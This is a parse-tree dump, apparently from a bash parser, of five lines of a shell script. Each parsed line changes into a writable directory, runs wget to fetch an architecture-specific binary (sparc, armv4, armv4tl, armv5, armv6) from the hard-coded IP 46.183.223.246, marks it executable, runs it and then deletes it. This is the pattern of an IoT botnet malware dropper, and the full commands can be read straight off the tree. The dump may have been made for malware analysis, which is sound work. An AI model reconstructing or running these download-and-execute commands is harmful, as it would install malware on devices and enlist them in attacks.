ListNode(lineno=15, pos=(2026, 2179), parts=[
  CommandNode(lineno=15, pos=(2026, 2033), parts=[
    WordNode(lineno=15, pos=(2026, 2028), word='cd'),
    WordNode(lineno=15, pos=(2029, 2033), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2034, 2036)),
  CommandNode(lineno=15, pos=(2037, 2051), parts=[
    WordNode(lineno=15, pos=(2037, 2039), word='cd'),
    WordNode(lineno=15, pos=(2040, 2051), word='/var/system'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2052, 2054)),
  CommandNode(lineno=15, pos=(2055, 2062), parts=[
    WordNode(lineno=15, pos=(2055, 2057), word='cd'),
    WordNode(lineno=15, pos=(2058, 2062), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2063, 2065)),
  CommandNode(lineno=15, pos=(2066, 2074), parts=[
    WordNode(lineno=15, pos=(2066, 2068), word='cd'),
    WordNode(lineno=15, pos=(2069, 2074), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2075, 2077)),
  CommandNode(lineno=15, pos=(2078, 2082), parts=[
    WordNode(lineno=15, pos=(2078, 2080), word='cd'),
    WordNode(lineno=15, pos=(2081, 2082), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2082, 2083)),
  CommandNode(lineno=15, pos=(2084, 2122), parts=[
    WordNode(lineno=15, pos=(2084, 2088), word='wget'),
    WordNode(lineno=15, pos=(2089, 2122), word='http://46.183.223.246/jackmysparc'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2122, 2123)),
  CommandNode(lineno=15, pos=(2124, 2144), parts=[
    WordNode(lineno=15, pos=(2124, 2129), word='chmod'),
    WordNode(lineno=15, pos=(2130, 2132), word='+x'),
    WordNode(lineno=15, pos=(2133, 2144), word='jackmysparc'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2144, 2145)),
  CommandNode(lineno=15, pos=(2146, 2159), parts=[
    WordNode(lineno=15, pos=(2146, 2159), word='./jackmysparc'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2159, 2160)),
  CommandNode(lineno=15, pos=(2161, 2179), parts=[
    WordNode(lineno=15, pos=(2161, 2163), word='rm'),
    WordNode(lineno=15, pos=(2164, 2167), word='-rf'),
    WordNode(lineno=15, pos=(2168, 2179), word='jackmysparc'),
  ]),
])
ListNode(lineno=16, pos=(2180, 2333), parts=[
  CommandNode(lineno=16, pos=(2180, 2187), parts=[
    WordNode(lineno=16, pos=(2180, 2182), word='cd'),
    WordNode(lineno=16, pos=(2183, 2187), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(2188, 2190)),
  CommandNode(lineno=16, pos=(2191, 2205), parts=[
    WordNode(lineno=16, pos=(2191, 2193), word='cd'),
    WordNode(lineno=16, pos=(2194, 2205), word='/var/system'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(2206, 2208)),
  CommandNode(lineno=16, pos=(2209, 2216), parts=[
    WordNode(lineno=16, pos=(2209, 2211), word='cd'),
    WordNode(lineno=16, pos=(2212, 2216), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(2217, 2219)),
  CommandNode(lineno=16, pos=(2220, 2228), parts=[
    WordNode(lineno=16, pos=(2220, 2222), word='cd'),
    WordNode(lineno=16, pos=(2223, 2228), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(2229, 2231)),
  CommandNode(lineno=16, pos=(2232, 2236), parts=[
    WordNode(lineno=16, pos=(2232, 2234), word='cd'),
    WordNode(lineno=16, pos=(2235, 2236), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(2236, 2237)),
  CommandNode(lineno=16, pos=(2238, 2276), parts=[
    WordNode(lineno=16, pos=(2238, 2242), word='wget'),
    WordNode(lineno=16, pos=(2243, 2276), word='http://46.183.223.246/jackmyarmv4'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(2276, 2277)),
  CommandNode(lineno=16, pos=(2278, 2298), parts=[
    WordNode(lineno=16, pos=(2278, 2283), word='chmod'),
    WordNode(lineno=16, pos=(2284, 2286), word='+x'),
    WordNode(lineno=16, pos=(2287, 2298), word='jackmyarmv4'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(2298, 2299)),
  CommandNode(lineno=16, pos=(2300, 2313), parts=[
    WordNode(lineno=16, pos=(2300, 2313), word='./jackmyarmv4'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(2313, 2314)),
  CommandNode(lineno=16, pos=(2315, 2333), parts=[
    WordNode(lineno=16, pos=(2315, 2317), word='rm'),
    WordNode(lineno=16, pos=(2318, 2321), word='-rf'),
    WordNode(lineno=16, pos=(2322, 2333), word='jackmyarmv4'),
  ]),
])
ListNode(lineno=17, pos=(2334, 2495), parts=[
  CommandNode(lineno=17, pos=(2334, 2341), parts=[
    WordNode(lineno=17, pos=(2334, 2336), word='cd'),
    WordNode(lineno=17, pos=(2337, 2341), word='/tmp'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(2342, 2344)),
  CommandNode(lineno=17, pos=(2345, 2359), parts=[
    WordNode(lineno=17, pos=(2345, 2347), word='cd'),
    WordNode(lineno=17, pos=(2348, 2359), word='/var/system'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(2360, 2362)),
  CommandNode(lineno=17, pos=(2363, 2370), parts=[
    WordNode(lineno=17, pos=(2363, 2365), word='cd'),
    WordNode(lineno=17, pos=(2366, 2370), word='/mnt'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(2371, 2373)),
  CommandNode(lineno=17, pos=(2374, 2382), parts=[
    WordNode(lineno=17, pos=(2374, 2376), word='cd'),
    WordNode(lineno=17, pos=(2377, 2382), word='/root'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(2383, 2385)),
  CommandNode(lineno=17, pos=(2386, 2390), parts=[
    WordNode(lineno=17, pos=(2386, 2388), word='cd'),
    WordNode(lineno=17, pos=(2389, 2390), word='/'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2390, 2391)),
  CommandNode(lineno=17, pos=(2392, 2432), parts=[
    WordNode(lineno=17, pos=(2392, 2396), word='wget'),
    WordNode(lineno=17, pos=(2397, 2432), word='http://46.183.223.246/jackmyarmv4tl'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2432, 2433)),
  CommandNode(lineno=17, pos=(2434, 2456), parts=[
    WordNode(lineno=17, pos=(2434, 2439), word='chmod'),
    WordNode(lineno=17, pos=(2440, 2442), word='+x'),
    WordNode(lineno=17, pos=(2443, 2456), word='jackmyarmv4tl'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2456, 2457)),
  CommandNode(lineno=17, pos=(2458, 2473), parts=[
    WordNode(lineno=17, pos=(2458, 2473), word='./jackmyarmv4tl'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2473, 2474)),
  CommandNode(lineno=17, pos=(2475, 2495), parts=[
    WordNode(lineno=17, pos=(2475, 2477), word='rm'),
    WordNode(lineno=17, pos=(2478, 2481), word='-rf'),
    WordNode(lineno=17, pos=(2482, 2495), word='jackmyarmv4tl'),
  ]),
])
ListNode(lineno=18, pos=(2496, 2649), parts=[
  CommandNode(lineno=18, pos=(2496, 2503), parts=[
    WordNode(lineno=18, pos=(2496, 2498), word='cd'),
    WordNode(lineno=18, pos=(2499, 2503), word='/tmp'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2504, 2506)),
  CommandNode(lineno=18, pos=(2507, 2521), parts=[
    WordNode(lineno=18, pos=(2507, 2509), word='cd'),
    WordNode(lineno=18, pos=(2510, 2521), word='/var/system'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2522, 2524)),
  CommandNode(lineno=18, pos=(2525, 2532), parts=[
    WordNode(lineno=18, pos=(2525, 2527), word='cd'),
    WordNode(lineno=18, pos=(2528, 2532), word='/mnt'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2533, 2535)),
  CommandNode(lineno=18, pos=(2536, 2544), parts=[
    WordNode(lineno=18, pos=(2536, 2538), word='cd'),
    WordNode(lineno=18, pos=(2539, 2544), word='/root'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2545, 2547)),
  CommandNode(lineno=18, pos=(2548, 2552), parts=[
    WordNode(lineno=18, pos=(2548, 2550), word='cd'),
    WordNode(lineno=18, pos=(2551, 2552), word='/'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2552, 2553)),
  CommandNode(lineno=18, pos=(2554, 2592), parts=[
    WordNode(lineno=18, pos=(2554, 2558), word='wget'),
    WordNode(lineno=18, pos=(2559, 2592), word='http://46.183.223.246/jackmyarmv5'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2592, 2593)),
  CommandNode(lineno=18, pos=(2594, 2614), parts=[
    WordNode(lineno=18, pos=(2594, 2599), word='chmod'),
    WordNode(lineno=18, pos=(2600, 2602), word='+x'),
    WordNode(lineno=18, pos=(2603, 2614), word='jackmyarmv5'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2614, 2615)),
  CommandNode(lineno=18, pos=(2616, 2629), parts=[
    WordNode(lineno=18, pos=(2616, 2629), word='./jackmyarmv5'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2629, 2630)),
  CommandNode(lineno=18, pos=(2631, 2649), parts=[
    WordNode(lineno=18, pos=(2631, 2633), word='rm'),
    WordNode(lineno=18, pos=(2634, 2637), word='-rf'),
    WordNode(lineno=18, pos=(2638, 2649), word='jackmyarmv5'),
  ]),
])
ListNode(lineno=19, pos=(2650, 2803), parts=[
  CommandNode(lineno=19, pos=(2650, 2657), parts=[
    WordNode(lineno=19, pos=(2650, 2652), word='cd'),
    WordNode(lineno=19, pos=(2653, 2657), word='/tmp'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2658, 2660)),
  CommandNode(lineno=19, pos=(2661, 2675), parts=[
    WordNode(lineno=19, pos=(2661, 2663), word='cd'),
    WordNode(lineno=19, pos=(2664, 2675), word='/var/system'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2676, 2678)),
  CommandNode(lineno=19, pos=(2679, 2686), parts=[
    WordNode(lineno=19, pos=(2679, 2681), word='cd'),
    WordNode(lineno=19, pos=(2682, 2686), word='/mnt'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2687, 2689)),
  CommandNode(lineno=19, pos=(2690, 2698), parts=[
    WordNode(lineno=19, pos=(2690, 2692), word='cd'),
    WordNode(lineno=19, pos=(2693, 2698), word='/root'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2699, 2701)),
  CommandNode(lineno=19, pos=(2702, 2706), parts=[
    WordNode(lineno=19, pos=(2702, 2704), word='cd'),
    WordNode(lineno=19, pos=(2705, 2706), word='/'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2706, 2707)),
  CommandNode(lineno=19, pos=(2708, 2746), parts=[
    WordNode(lineno=19, pos=(2708, 2712), word='wget'),
    WordNode(lineno=19, pos=(2713, 2746), word='http://46.183.223.246/jackmyarmv6'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2746, 2747)),
  CommandNode(lineno=19, pos=(2748, 2768), parts=[
    WordNode(lineno=19, pos=(2748, 2753), word='chmod'),
    WordNode(lineno=19, pos=(2754, 2756), word='+x'),
    WordNode(lineno=19, pos=(2757, 2768), word='jackmyarmv6'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2768, 2769)),
  CommandNode(lineno=19, pos=(2770, 2783), parts=[
    WordNode(lineno=19, pos=(2770, 2783), word='./jackmyarmv6'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2783, 2784)),
  CommandNode(lineno=19, pos=(2785, 2803), parts=[
    WordNode(lineno=19, pos=(2785, 2787), word='rm'),
    WordNode(lineno=19, pos=(2788, 2791), word='-rf'),
    WordNode(lineno=19, pos=(2792, 2803), word='jackmyarmv6'),
  ]),
])
